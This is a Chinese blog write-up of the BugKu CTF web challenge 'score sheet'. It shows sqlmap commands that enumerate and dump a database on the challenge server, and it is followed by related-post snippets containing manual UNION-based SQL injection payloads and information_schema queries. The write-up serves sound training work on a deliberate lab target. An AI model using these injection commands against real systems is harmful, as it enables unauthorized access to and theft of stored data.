BUGKU--web--成绩单解析

最新推荐文章于 2021-07-24 21:36:14 发布
最新推荐文章于 2021-07-24 21:36:14 发布
阅读量212 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CruiseTom/article/details/108191144
版权

BUGKU成绩单
没有任何过滤 非常友好
题目地址 :http://123.206.87.240:8002/chengjidan/
在这里插入图片描述

按照题目提示输入123分别的到不同的人的成绩单
在这里插入图片描述
4以后出现空白,由此可以推测有4列
在这里插入图片描述
基本到这里就是典型的sql注入题了
打开BP firefox浏览器调节代理
在这里插入图片描述
BP抓包发现是POST传值
在这里插入图片描述
关闭代理,关闭BP
上sqlmap注入

python sqlmap.py -u "http://123.206.87.240:8002/chengjidan/index.php" --forms --dbs

在这里插入图片描述
发现两个库
第一个information_schema存在flag的概率很低
直接看第二个库skctf_flag
go ahead !!!

python sqlmap.py -u "http://123.206.87.240:8002/chengjidan/index.php" --forms -D skctf_flag --tables

WOW ~ two tables
在这里插入图片描述
go on

python sqlmap.py -u "http://123.206.87.240:8002/chengjidan/index.php" --forms -D skctf_flag -T fl4g -columns

在这里插入图片描述
最后爆字段

python sqlmap.py -u "http://123.206.87.240:8002/chengjidan/index.php" --forms -D skctf_flag -T fl4g -C skctf_flag --dump

flag 到手
在这里插入图片描述
GG

大敏饭团子
关注
BugkuCTF-web-成绩单 writeup
kuller_Yan的博客
03-26 439
记一次简单的SQL注入 题目传送门,点击即走 首先分析题目:进入题目网页就可以看到这个 遇到表单,当然要填一填,看看有什么变化。于是我根据题目提示输入1。仔细观察可以发现输入1,并且返回后,出现了龙龙龙的成绩单以及四份数据。 于是打开hackbar,post提交 正常返回,加 ’ 测试一下 啥也不是,再加个 # 又正常了。 那么基本可以认定是SQL注入无疑了。 两种解题方法: 1:手...
BUGKU-WEB
wojiushilsy的博客
02-22 538
5.矛盾 打开链接,内容如下: $num=$_GET['num']; if(!is_numeric($num)) { echo $num; if($num==1) echo 'flag{**********}'; } is_numeric():检测字符串是否只由数字组成,如果字符串中只包括数字,就返回Ture,否则返回False。(注意是只包括数字) 要求我们不能输入纯数字1,但是num...
成绩单bugku--web
小白的劝退之路
04-29 434
解法一:手工注入 输入1,2,3分别能查到1,2,3号学生的成绩 SQL注入应该没跑了 输入1’返回异常,输入1’–+返回异常,输入1’ #或者1’-- +返回正常,看来过滤了–+ 观察,表貌似有四列(名字,Math,English,Chinese),输入1’ order by 4#返回正常,输入1’ order by 5#返回异常,看来的确是4列 接下来就开始暴库名、表名、字段名 尝试联合查询,...
bugku成绩单
qq_43677324的博客
03-09 928
bugku成绩单 详细解析 1,我们首先分别输入1,2,3, 均有输出 我们输入1’ 没有回响 因此我们可以判断存在sql注入 2.我们分别输入 1' order by 1# 1' order by 2# 1' order by 3# 1' order by 4# 均有回响 但是当我们使用 1' order by 5# 时,没有回响 因此我们可以根据此判断字段数为4 3, 之后就是最精彩的地...
bugku 成绩单
weixin_46578840的博客
07-24 88
打开网站抓包,直接开整 -1’ union select 1,2,3,4 – //四列 -1’ union select 1,2,3,database() – //得出数据库 -1’ union select 1,2,3,(select group_concat(table_name) from information_schema.tables wheretable_schema=‘skctf’) – //得出表 id=-94’ union select 1,2,3,(select group_conca
006-CTF web题型总结-第六课 CTF WEB实战练习(二) .pdf
07-09
1. **bugku-ctf 第一题:成绩单** 这个题目可能涉及到SQL注入攻击,考生需要识别并利用输入字段中的漏洞,通过构造特定的查询语句来获取隐藏的成绩单信息。 2. **bugku-ctf 第二题:秋名山老司机** 可能与文件...
CTF|BugkuCTF-WEB解题思路
这里是一处长期不更新的博客
06-15 2002
截止至练习题【login4】,仅提供解题思路。 WEB2 按F12直接可得flag 计算器: 直接按F12,将maxlength修改,输入正确结果即可得到flag web基础$_GET URL输入:http://123.206.87.240:8002/get/?what=flag web基础$_POST 使用hackbar工具,按F12,打开Post data,传递what=flag。 矛盾 这里是使用is_numeric遇到%00截断的漏洞,这里构造 http://120.24.86.145:8002.
BugkuCTF练习题解——Web
qq_41739275的博客
08-24 6648
文章目录1.Web22.计算器3.Web基础$_GET4.Web基础$_POST5.矛盾6.Web37.域名解析8.你必须让他停下9.本地包含10.变量111.Web512.头等舱13.网站被黑14.管理员系统15.Web416.flag在index中17.输入密码查看flag18.点击100万次19.备份是个好习惯 1.Web2 打开链接之后是滑稽笑脸,好家伙,吓我一跳,还以为是大bug,然后也没有提示啥的 感觉有点无从下手???别急,打开页面源代码(检查元素也可)瞅瞅 注释部分就是flag了。 2.
Bugkuweb题解
Lemon's blog
08-21 2622
前言:最近做了一些Bugku入门的web题目,感觉web题挺有趣的,并非是得出flag,而是可以通过一个题目学习到很多知识。 域名解析 题目说把 flag.baidu.com 解析到123.206.87.240 就能拿到flag,如果了解域名解析的原理和系统文件host的作用,那这道题就很简单了。 通俗的话说:域名是为了我们方便记忆,但计算机识别的是IP地址,所以要将域名解析为IP地址才能访问到自...
BugKu——成绩单
D-R0s1的博客
10-08 901
  sql注入在CTF类竞赛中占着很大的比重,在做BugKu的题目的过程中恰好遇到了一个没有任何过滤,直接注入的题目,因为没有过滤,只是单纯的考察sql注入,所以步骤比较固定,语句也比较简单 1.首先,爆列数 1’ order by 4# 1’ order by 5#按照提示分别输入1,2,3都有回显,然后遍历一遍-1’ union select 1,2,3,4# 目录四个表都有回显 2.暴库...
BugKu成绩单
Tle_Camouflage的博客
08-23 1480
成绩单(Web) 输入1并进行抓包。 然后按右键,点击copy to file保存文件,这里我保存到了C盘 333.txt。 然后打开sqlmap开始爆库:sqlmap.py -r “C:\333.txt” -p id –current-db -r –> 加载一个文件 -p –>指定参数 –current-db –>获取当前数据库名称(current前有...
bugku---成绩单
LuckySec
11-16 518
题目 http://123.206.87.240:8002/chengjidan/index.php 使用sqlmap进行注入 首先输入检测是否有注入点 python E:\Python27\sqlmap\sqlmapproject-sqlmap-6d48df2\sqlmap.py -u “http://123.206.87.240:8002/chengjidan/index.php” --d...
bugku 成绩单 总结
DreamHigh
08-28 2974
试题地址: http://40.125.170.89:49164/index.php 成绩查询     龙龙龙的成绩单 Math English Chinese 60 60 70 方法一:常规方法 进入这道题目 我们先手遍历一遍 id=-1' union select 1,2,3,4# 发现有四个表且都有回显 于是 就开始爆破吧 通过id=-1...
Bugkuweb 成绩单
qq_26961571的博客
06-23 305
从这里开始进入SQL注入的普通模式啦!!撒花~~ ​ 虽然真的学过数据库,可是需要有很熟悉的PHP和数据库变量名字的理解,大概才能很好的学习这个部分。 首先打开这个题目, 快来查查成绩吧! 这里还是有一些提示的,框框里面要求输入1,2,3这种数字以便查询。但是...我们怎么能用普通的思维呢???!! 那么先什么都不输入看看。 什么都木有啊! 还是输个1看看。 接下来输了2和3也是有数据的,4就没有数据了,感觉这个数据库表...
bugku 成绩单详解
qq_35811830的博客
01-26 1268
bugku 成绩单详解 首先打开查询成绩的页面 在火狐浏览器下使用hackbar插件对页面进行post请求,分别依次输入id=1,2,3,4 当你这样去试了之后,就会发现当输入id=1,2,3,的时候分别有三个孩子的成绩,但是当id=4的时候,成绩单里面的成绩又为空了。 因此我们可以猜测数据库里面一共是有四列的 然后在此处利用内置函数database()爆破获取数据库的名字。 至于为什么使用u...
bugku 成绩查询
Superpig的博客
11-10 2332
分析 典型的sql联合注入,用bp进行爆破。 step1: 联合注入要求查询列数相同,姓名、语数外一共四个数据,因此select 1,2,3,4 令id=a’是为了使前一个查询无效而回显第二个查询(也可以使用其他字符,只要保证union前的查询无效即可) id=a' union select 1,2,3,4# step2:查询数据库名 id=a' union select 1,2,3,datab...
BugkuCTF-web-成绩单 WP
会下雪的晴天
07-12 1705
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 个人收获:最基本的SQL注入 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 题目描述 解题传送门:http://123.206.87.240:8002/chengjidan/ 解题思路 查看源...
bugku chatgpt-1
最新发布
10-09
ChatGPT是一种由OpenAI训练的大型语言模型。它的原理是基于Transformer架构,通过预训练大量文本数据来学习如何生成人类可读的文本,然后通过接受输入并生成输出来实现对话。 ChatGPT的用途非常广泛,可以用于自然...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值